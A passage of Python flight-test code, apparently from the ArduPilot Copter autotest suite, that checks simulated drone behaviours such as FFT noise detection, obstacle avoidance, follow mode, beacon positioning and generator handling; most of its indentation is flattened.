self.set_rc(2, 1500)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
            # batch sampler defaults give a 1024-point FFT and a sample rate of 1kHz, so roughly 1Hz/bin
scale = 1000. / 1024.
sminhz = int(100 * scale)
smaxhz = int(350 * scale)
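            # e.g. sminhz = int(100 * 1000/1024) == 97 and smaxhz == 341,
            # so we search the bins covering roughly 100-350Hz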
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < 0:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Detected %fHz motor peak at %fdB" % (freq, peakdb))
# Step 4: loop sample rate test with larger window
self.start_subtest("Hover and check that the FFT can find the motor noise when running at fast loop rate")
# we are limited to half the loop rate for frequency detection
self.set_parameters({
"FFT_MAXHZ": 185,
"INS_LOG_BAT_OPT": 0,
"SIM_VIB_MOT_MAX": 220,
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 1,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
            # prevent parameter updates from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# must reboot after we move away from EKF type 10 to EKF2 or EKF3
self.reboot_sitl()
if ex is not None:
raise ex
def fly_brake_mode(self):
# test brake mode
self.progress("Testing brake mode")
self.takeoff(10, mode="LOITER")
self.progress("Ensuring RC inputs have no effect in brake mode")
self.change_mode("STABILIZE")
self.set_rc(3, 1500)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.change_mode("BRAKE")
self.wait_groundspeed(0, 1)
self.set_rc(2, 1500)
self.do_RTL()
self.progress("Ran brake mode")
def fly_guided_move_to(self, destination, timeout=30):
'''move to mavutil.location location; absolute altitude'''
tstart = self.get_sim_time()
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
int(destination.lat * 1e7), # lat
int(destination.lng * 1e7), # lon
destination.alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time() - tstart > timeout:
                raise NotAchievedException("Did not reach destination within %u seconds" % timeout)
delta = self.get_distance(self.mav.location(), destination)
self.progress("delta=%f (want <1)" % delta)
if delta < 1:
break
    def test_altitude_types(self):
        '''This test flies the vehicle somewhere lower than where it
        started.  It then disarms.  It then arms, which should reset home
        to the new, lower altitude.  This delta should be outside 1m but
        within a few metres of the old one.

        We start by disabling GCS failsafe, otherwise we immediately
        disarm due to (apparently) not receiving traffic from the GCS for
        too long.  This is probably a function of --speedup.
        '''
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
self.set_parameter("FS_GCS_ENABLE", 0)
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
        max_initial_home_alt_mm = 500
        if m.relative_alt > max_initial_home_alt_mm:
            raise NotAchievedException("Initial home alt too high (%fm > %fm)" %
                                       (m.relative_alt/1000.0, max_initial_home_alt_mm/1000.0))
orig_home_offset_mm = m.alt - m.relative_alt
self.user_takeoff(5)
self.progress("Flying to low position")
current_alt = self.mav.location().alt
        # 10m delta:
        # low_position = mavutil.location(-35.358273, 149.169165, current_alt, 0)
low_position = mavutil.location(-35.36200016, 149.16415599, current_alt, 0)
self.fly_guided_move_to(low_position, timeout=240)
self.change_mode('LAND')
        # home should not change merely because we disarmed; it should
        # only reset when we next arm
self.wait_landed_and_disarmed()
# wait a while for home to move (it shouldn't):
self.delay_sim_time(10)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_home_offset_mm = m.alt - m.relative_alt
home_offset_delta_mm = orig_home_offset_mm - new_home_offset_mm
self.progress("new home offset: %f delta=%f" %
(new_home_offset_mm, home_offset_delta_mm))
self.progress("gpi=%s" % str(m))
max_home_offset_delta_mm = 10
if home_offset_delta_mm > max_home_offset_delta_mm:
raise NotAchievedException("Large home offset delta: want<%f got=%f" %
(max_home_offset_delta_mm, home_offset_delta_mm))
self.progress("Ensuring home moves when we arm")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
post_arming_home_offset_mm = m.alt - m.relative_alt
self.progress("post-arming home offset: %f" % (post_arming_home_offset_mm))
self.progress("gpi=%s" % str(m))
        # home should have dropped by 3-4m on arming (we landed lower
        # than we started); these deltas are negative, so "min" is the
        # upper bound and "max" the lower:
        min_post_arming_home_offset_delta_mm = -3000
        max_post_arming_home_offset_delta_mm = -4000
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm = post_arming_home_offset_mm - orig_home_offset_mm
self.progress("delta=%f-%f=%f" % (
post_arming_home_offset_mm,
orig_home_offset_mm,
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.progress("Home moved %fm vertically" % (delta_between_original_home_alt_offset_and_new_home_alt_offset_mm/1000.0))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm > min_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home did not move vertically on arming: want<=%f got=%f" %
(min_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm < max_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home moved too far vertically on arming: want>=%f got=%f" %
(max_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.wait_disarmed()
self.stop_mavproxy(mavproxy)
def fly_precision_companion(self):
"""Use Companion PrecLand backend precision messages to loiter."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
# enable companion backend:
self.set_parameter("PLND_TYPE", 1)
self.set_analog_rangefinder_parameters()
# set up a channel switch to enable precision loiter:
self.set_parameter("RC7_OPTION", 39)
self.reboot_sitl()
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
# we should be doing precision loiter at this point
start = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
self.arm_vehicle()
self.set_rc(3, 1800)
alt_min = 10
self.wait_altitude(alt_min,
(alt_min + 5),
relative=True)
self.set_rc(3, 1500)
# move away a little
self.set_rc(2, 1550)
self.wait_distance(5, accuracy=1)
self.set_rc(2, 1500)
self.change_mode('LOITER')
# turn precision loiter on:
self.set_rc(7, 2000)
# try to drag aircraft to a position 5 metres north-east-east:
self.loiter_to_ne(start.x + 5, start.y + 10, start.z + 10)
self.loiter_to_ne(start.x + 5, start.y - 10, start.z + 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def loiter_requires_position(self):
# ensure we can't switch to LOITER without position
self.progress("Ensure we can't enter LOITER without position")
self.context_push()
self.set_parameter("GPS_TYPE", 2)
self.set_parameter("SIM_GPS_DISABLE", 1)
self.reboot_sitl()
# check for expected EKF flags
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
expected_ekf_flags = (mavutil.mavlink.ESTIMATOR_ATTITUDE |
mavutil.mavlink.ESTIMATOR_VELOCITY_VERT |
mavutil.mavlink.ESTIMATOR_POS_VERT_ABS |
mavutil.mavlink.ESTIMATOR_CONST_POS_MODE)
if ahrs_ekf_type == 2:
expected_ekf_flags = expected_ekf_flags | mavutil.mavlink.ESTIMATOR_PRED_POS_HORIZ_REL
self.wait_ekf_flags(expected_ekf_flags, 0, timeout=120)
# arm in Stabilize and attempt to switch to Loiter
self.change_mode('STABILIZE')
self.arm_vehicle()
self.context_collect('STATUSTEXT')
self.run_cmd_do_set_mode(
"LOITER",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext("requires position", check_context=True)
self.disarm_vehicle()
self.context_pop()
self.reboot_sitl()
def test_arm_feature(self):
self.loiter_requires_position()
super(AutoTestCopter, self).test_arm_feature()
def test_parameter_checks(self):
self.test_parameter_checks_poscontrol("PSC")
def fly_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(2)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle up")
self.set_rc(3, 1710)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover throttle")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_alt = 500
if abs(m.relative_alt) > max_initial_alt:
raise NotAchievedException("Took off too fast (%f > %f" %
(abs(m.relative_alt), max_initial_alt))
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def initial_mode(self):
return "STABILIZE"
def initial_mode_switch_mode(self):
return "STABILIZE"
def default_mode(self):
return "STABILIZE"
def rc_defaults(self):
ret = super(AutoTestCopter, self).rc_defaults()
ret[3] = 1000
ret[5] = 1800 # mode switch
return ret
def test_manual_control(self):
'''test manual_control mavlink message'''
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.change_mode('STABILIZE')
self.takeoff(10)
tstart = self.get_sim_time_cached()
want_pitch_degrees = -12
while True:
if self.get_sim_time_cached() - tstart > 10:
raise AutoTestTimeoutException("Did not reach pitch")
self.progress("Sending pitch-forward")
self.mav.mav.manual_control_send(
1, # target system
500, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
m = self.mav.recv_match(type='ATTITUDE', blocking=True, timeout=1)
print("m=%s" % str(m))
if m is None:
continue
p = math.degrees(m.pitch)
self.progress("pitch=%f want<=%f" % (p, want_pitch_degrees))
if p <= want_pitch_degrees:
break
self.mav.mav.manual_control_send(
1, # target system
32767, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
self.do_RTL()
def check_avoidance_corners(self):
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.363007,
149.164911,
0,
0)
self.wait_location(west_loc, accuracy=6)
north_loc = mavutil.location(-35.362908,
149.165051,
0,
0)
self.reach_heading_manual(0)
self.wait_location(north_loc, accuracy=6, timeout=200)
self.reach_heading_manual(90)
east_loc = mavutil.location(-35.363013,
149.165194,
0,
0)
self.wait_location(east_loc, accuracy=6)
self.reach_heading_manual(225)
self.wait_location(west_loc, accuracy=6, timeout=200)
self.set_rc(2, 1500)
self.do_RTL()
def OBSTACLE_DISTANCE_3D_test_angle(self, angle):
now = self.get_sim_time_cached()
distance = 15
right = distance * math.sin(math.radians(angle))
front = distance * math.cos(math.radians(angle))
down = 0
expected_distance_cm = distance * 100
# expected orientation
expected_orientation = int((angle+22.5)/45) % 8
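        # e.g. angle=100 gives int(122.5/45) % 8 == 2, i.e. the YAW_90
        # sector; each of the 8 sectors spans 45 degrees centred on a
        # multiple of 45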
self.progress("Angle %f expected orient %u" %
(angle, expected_orientation))
tstart = self.get_sim_time()
last_send = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > 10:
raise NotAchievedException("Did not get correct angle back")
if now - last_send > 0.1:
self.progress("ang=%f sending front=%f right=%f" %
(angle, front, right))
self.mav.mav.obstacle_distance_3d_send(
int(now*1000), # time_boot_ms
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER,
mavutil.mavlink.MAV_FRAME_BODY_FRD,
65535,
front, # x (m)
right, # y (m)
down, # z (m)
0, # min_distance (m)
20 # max_distance (m)
)
last_send = now
m = self.mav.recv_match(type="DISTANCE_SENSOR",
blocking=True,
timeout=1)
if m is None:
continue
# self.progress("Got (%s)" % str(m))
if m.orientation != expected_orientation:
# self.progress("Wrong orientation (want=%u got=%u)" %
# (expected_orientation, m.orientation))
continue
if abs(m.current_distance - expected_distance_cm) > 1:
# self.progress("Wrong distance (want=%f got=%f)" %
# (expected_distance_cm, m.current_distance))
continue
self.progress("distance-at-angle good")
break
def OBSTACLE_DISTANCE_3D(self):
self.context_push()
ex = None
try:
self.set_parameters({
"SERIAL5_PROTOCOL": 1,
"PRX_TYPE": 2,
})
self.reboot_sitl()
for angle in range(0, 360):
self.OBSTACLE_DISTANCE_3D_test_angle(angle)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_corners(self):
self.start_subtest("Corners")
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("PRX_TYPE", 10)
self.set_parameter("RC10_OPTION", 40) # proximity-enable
self.reboot_sitl()
self.progress("Enabling proximity")
self.set_rc(10, 2000)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_alt_no_avoid(self):
self.start_subtest("Alt-no-avoid")
self.context_push()
ex = None
try:
self.set_parameter("PRX_TYPE", 2)
self.set_parameter("AVOID_ALT_MIN", 10)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
tstart = self.get_sim_time()
self.change_mode('LOITER')
while True:
if self.armed():
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not arm")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
400, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
26, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.send_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0)
self.wait_heartbeat()
self.takeoff(15, mode='LOITER')
self.progress("Poking vehicle; should avoid")
def shove(a, b):
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.wait_speed_vector_bf(
Vector3(-0.4, 0.0, 0.0),
timeout=10,
called_function=shove,
)
self.change_alt(5)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 10:
break
vel = self.get_body_frame_velocity()
if vel.length() > 0.3:
raise NotAchievedException("Moved too much (%s)" %
(str(vel),))
shove(None, None)
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test(self):
self.fly_proximity_avoidance_test_alt_no_avoid()
self.fly_proximity_avoidance_test_corners()
def fly_fence_avoidance_test(self):
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def global_position_int_for_location(self, loc, time_boot, heading=0):
return self.mav.mav.global_position_int_encode(
int(time_boot * 1000), # time_boot_ms
int(loc.lat * 1e7),
int(loc.lng * 1e7),
int(loc.alt * 1000), # alt in mm
            20, # relative alt (mm) - hard-coded, alas
vx=0,
vy=0,
vz=0,
hdg=heading
)
def fly_follow_mode(self):
self.set_parameter("FOLL_ENABLE", 1)
self.set_parameter("FOLL_SYSID", self.mav.source_system)
foll_ofs_x = 30 # metres
self.set_parameter("FOLL_OFS_X", -foll_ofs_x)
self.set_parameter("FOLL_OFS_TYPE", 1) # relative to other vehicle heading
self.takeoff(10, mode="LOITER")
self.set_parameter("SIM_SPEEDUP", 1)
self.change_mode("FOLLOW")
new_loc = self.mav.location()
new_loc_offset_n = 20
new_loc_offset_e = 30
self.location_offset_ne(new_loc, new_loc_offset_n, new_loc_offset_e)
self.progress("new_loc: %s" % str(new_loc))
heading = 0
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f greenplane %f\n" %
(new_loc.lat, new_loc.lng, heading))
expected_loc = copy.copy(new_loc)
self.location_offset_ne(expected_loc, -foll_ofs_x, 0)
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f hoop\n" %
(expected_loc.lat, expected_loc.lng))
self.progress("expected_loc: %s" % str(expected_loc))
last_sent = 0
tstart = self.get_sim_time()
while True:
now = self.get_sim_time_cached()
if now - tstart > 60:
raise NotAchievedException("Did not FOLLOW")
if now - last_sent > 0.5:
gpi = self.global_position_int_for_location(new_loc,
now,
heading=heading)
gpi.pack(self.mav.mav)
self.mav.mav.send(gpi)
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
pos = self.mav.location()
delta = self.get_distance(expected_loc, pos)
max_delta = 3
self.progress("position delta=%f (want <%f)" % (delta, max_delta))
if delta < max_delta:
break
self.do_RTL()
def get_global_position_int(self, timeout=30):
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get good global_position_int")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("GPI: %s" % str(m))
if m is None:
continue
if m.lat != 0 or m.lon != 0:
return m
def fly_beacon_position(self):
self.reboot_sitl()
self.wait_ready_to_arm(require_absolute=True)
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", SITL_START_LOCATION.lat)
self.set_parameter("BCN_LONGITUDE", SITL_START_LOCATION.lng)
self.set_parameter("BCN_ALT", SITL_START_LOCATION.alt)
self.set_parameter("BCN_ORIENT_YAW", 0)
self.set_parameter("AVOID_ENABLE", 4)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK3_SRC1_POSXY", 4) # Beacon
self.set_parameter("EK3_SRC1_POSZ", 1) # Baro
self.set_parameter("EK3_SRC1_VELXY", 0) # None
self.set_parameter("EK3_SRC1_VELZ", 0) # None
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.reboot_sitl()
            # turn off GPS arming checks.  It may be considered a bug
            # that we need to do this.
            old_arming_check = int(self.get_parameter("ARMING_CHECK"))
            if old_arming_check == 1:
                # ARMING_CHECK of 1 means "all checks"; expand it to an
                # explicit bitmask so individual bits can be cleared:
                old_arming_check = (1 << 25) - 1
            new_arming_check = int(old_arming_check) & ~(1 << 3)
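            # e.g. 0x1FFFFFF & ~(1 << 3) == 0x1FFFFF7: every check bit
            # except bit 3, the GPS-lock check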
self.set_parameter("ARMING_CHECK", new_arming_check)
self.reboot_sitl()
            # require_absolute=True implies a GPS is present
self.wait_ready_to_arm(require_absolute=False)
tstart = self.get_sim_time()
timeout = 20
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get new position like old position")
self.progress("Fetching location")
new_pos = self.get_global_position_int()
pos_delta = self.get_distance_int(old_pos, new_pos)
max_delta = 1
self.progress("delta=%u want <= %u" % (pos_delta, max_delta))
if pos_delta <= max_delta:
break
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="STABILIZE")
self.change_mode("CIRCLE")
tstart = self.get_sim_time()
max_delta = 0
max_allowed_delta = 10
while True:
if self.get_sim_time_cached() - tstart > timeout:
break
pos_delta = self.get_distance_int(self.sim_location_int(), self.get_global_position_int())
self.progress("pos_delta=%f max_delta=%f max_allowed_delta=%f" % (pos_delta, max_delta, max_allowed_delta))
if pos_delta > max_delta:
max_delta = pos_delta
if pos_delta > max_allowed_delta:
raise NotAchievedException("Vehicle location not tracking simulated location (%f > %f)" %
(pos_delta, max_allowed_delta))
self.progress("Tracked location just fine (max_delta=%f)" % max_delta)
self.change_mode("LOITER")
self.wait_groundspeed(0, 0.3, timeout=120)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_beacon_avoidance_test(self):
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", int(SITL_START_LOCATION.lat))
self.set_parameter("BCN_LONGITUDE", int(SITL_START_LOCATION.lng))
self.set_parameter("BCN_ORIENT_YAW", 45)
self.set_parameter("AVOID_ENABLE", 4)
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.362919, 149.165055, 0, 0)
self.wait_location(west_loc, accuracy=7)
self.reach_heading_manual(0)
north_loc = mavutil.location(-35.362881, 149.165103, 0, 0)
self.wait_location(north_loc, accuracy=7)
self.set_rc(2, 1500)
self.set_rc(1, 1600)
east_loc = mavutil.location(-35.362986, 149.165227, 0, 0)
self.wait_location(east_loc, accuracy=7)
self.set_rc(1, 1500)
self.set_rc(2, 1600)
south_loc = mavutil.location(-35.363025, 149.165182, 0, 0)
self.wait_location(south_loc, accuracy=7)
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_wind_baro_compensation(self):
self.context_push()
ex = None
try:
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto'))],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
wind_spd_truth = 8.0
wind_dir_truth = 90.0
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.set_parameter("BARO1_WCF_ENABLE", 1.000000)
self.reboot_sitl()
self.set_parameter("EK3_DRAG_BCOEF_X", 361.000000)
self.set_parameter("EK3_DRAG_BCOEF_Y", 361.000000)
self.set_parameter("EK3_DRAG_MCOEF", 0.082000)
self.set_parameter("BARO1_WCF_FWD", -0.300000)
self.set_parameter("BARO1_WCF_BCK", -0.300000)
self.set_parameter("BARO1_WCF_RGT", 0.300000)
self.set_parameter("BARO1_WCF_LFT", 0.300000)
self.set_parameter("SIM_BARO_WCF_FWD", -0.300000)
self.set_parameter("SIM_BARO_WCF_BAK", -0.300000)
self.set_parameter("SIM_BARO_WCF_RGT", 0.300000)
self.set_parameter("SIM_BARO_WCF_LFT", 0.300000)
self.set_parameter("SIM_WIND_DIR", wind_dir_truth)
self.set_parameter("SIM_WIND_SPD", wind_spd_truth)
self.set_parameter("SIM_WIND_T", 1.000000)
self.reboot_sitl()
            # require_absolute=True implies a GPS is present
self.wait_ready_to_arm(require_absolute=False)
self.progress("Climb to 20m in LOITER and yaw spin for 30 seconds")
self.takeoff(10, mode="LOITER")
self.set_rc(4, 1400)
self.delay_sim_time(30)
            # check wind estimates
m = self.mav.recv_match(type='WIND', blocking=True)
speed_error = abs(m.speed - wind_spd_truth)
angle_error = abs(m.direction - wind_dir_truth)
if (speed_error > 1.0):
raise NotAchievedException("Wind speed incorrect - want %f +-1 got %f m/s" % (wind_spd_truth, m.speed))
if (angle_error > 15.0):
raise NotAchievedException(
"Wind direction incorrect - want %f +-15 got %f deg" %
(wind_dir_truth, m.direction))
self.progress("Wind estimate is good, now check height variation for 30 seconds")
# check height stability over another 30 seconds
z_min = 1E6
z_max = -1E6
tstart = self.get_sim_time()
while (self.get_sim_time() < tstart + 30):
m = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
if (m.z > z_max):
z_max = m.z
if (m.z < z_min):
z_min = m.z
if (z_max-z_min > 0.5):
raise NotAchievedException("Height variation is excessive")
self.progress("Height variation is good")
self.set_rc(4, 1500)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def wait_generator_speed_and_state(self, rpm_min, rpm_max, want_state, timeout=240):
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not move to state/speed")
m = self.mav.recv_match(type="GENERATOR_STATUS", blocking=True, timeout=10)
if m is None:
raise NotAchievedException("Did not get GENERATOR_STATUS")
if m.generator_speed < rpm_min:
self.progress("Too slow (%u<%u)" % (m.generator_speed, rpm_min))
continue
if m.generator_speed > rpm_max:
self.progress("Too fast (%u>%u)" % (m.generator_speed, rpm_max))
continue
            if m.status != want_state:
                self.progress("Wrong state (got=%u want=%u)" % (m.status, want_state))
                continue
            break
self.progress("Got generator speed and state")
def test_richenpower(self):
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SIM_RICH_ENABLE", 1)
self.set_parameter("SERVO8_FUNCTION", 42)
self.set_parameter("SIM_RICH_CTRL", 8)
self.set_parameter("RC9_OPTION", 85)
self.set_parameter("LOG_DISARMED", 1)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("GEN_TYPE", 3)
self.reboot_sitl()
self.set_rc(9, 1000) # remember this is a switch position - stop
self.customise_SITL_commandline(["--uartF=sim:richenpower"])
self.wait_statustext("requested state is not RUN", timeout=60)
self.set_message_rate_hz("GENERATOR_STATUS", 10)
self.drain_mav_unparsed()
self.wait_generator_speed_and_state(0, 0, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_OFF)
messages = []
def my_message_hook(mav, m):
if m.get_type() != 'STATUSTEXT':
return
messages.append(m)
self.install_message_hook(my_message_hook)
try:
self.set_rc(9, 2000) # remember this is a switch position - run
finally:
self.remove_message_hook(my_message_hook)
if "Generator HIGH" not in [x.text for x in messages]:
self.wait_statustext("Generator HIGH", timeout=60)
self.set_rc(9, 1000) # remember this is a switch position - stop
self.wait_statustext("requested state is not RUN", timeout=200)
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 8000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.set_rc(9, 2000) # remember this is a switch position - run
# self.wait_generator_speed_and_state(3000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_WARMING_UP)
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
bs = self.mav.recv_match(
type="BATTERY_STATUS",
condition="BATTERY_STATUS.id==1", # id is zero-indexed
timeout=1,
blocking=True
)
if bs is None:
raise NotAchievedException("Did not receive BATTERY_STATUS")
self.progress("Received battery status: %s" % str(bs))
want_bs_volt = 50000
if bs.voltages[0] != want_bs_volt:
raise NotAchievedException("Battery voltage not as expected (want=%f) got=(%f)" % (want_bs_volt, bs.voltages[0],))
self.progress("Moving *back* to idle")
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 10000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.progress("Moving *back* to run")
self.set_rc(9, 2000) # remember this is a switch position - run
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
self.set_message_rate_hz("GENERATOR_STATUS", -1)
self.set_parameter("LOG_DISARMED", 0)
if not self.current_onboard_log_contains_message("GEN"):
raise NotAchievedException("Did not find expected GEN message")
def test_ie24(self):
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SERIAL5_BAUD", 115200)
self.set_parameter("GEN_TYPE", 2)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("SIM_IE24_ENABLE", 1)
self.set_parameter("LOG_DISARMED", 1)
self.customise_SITL_commandline(["--uartF=sim:ie24"])
self.wait_ready_to_arm()
self.arm_vehicle()
self.disarm_vehicle()
            # Test for pre-arm check fail when state is not running
            self.start_subtest("Generator pre-arm check should fail when the state is not running")
self.set_parameter("SIM_IE24_STATE", 8)
self.wait_statustext("Status not running", timeout=40)
self.try_arm(result=False,
expect_msg="Status not running")
self.set_parameter("SIM_IE24_STATE", 2) # Explicitly set state to running
# Test that error code does result in failsafe
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
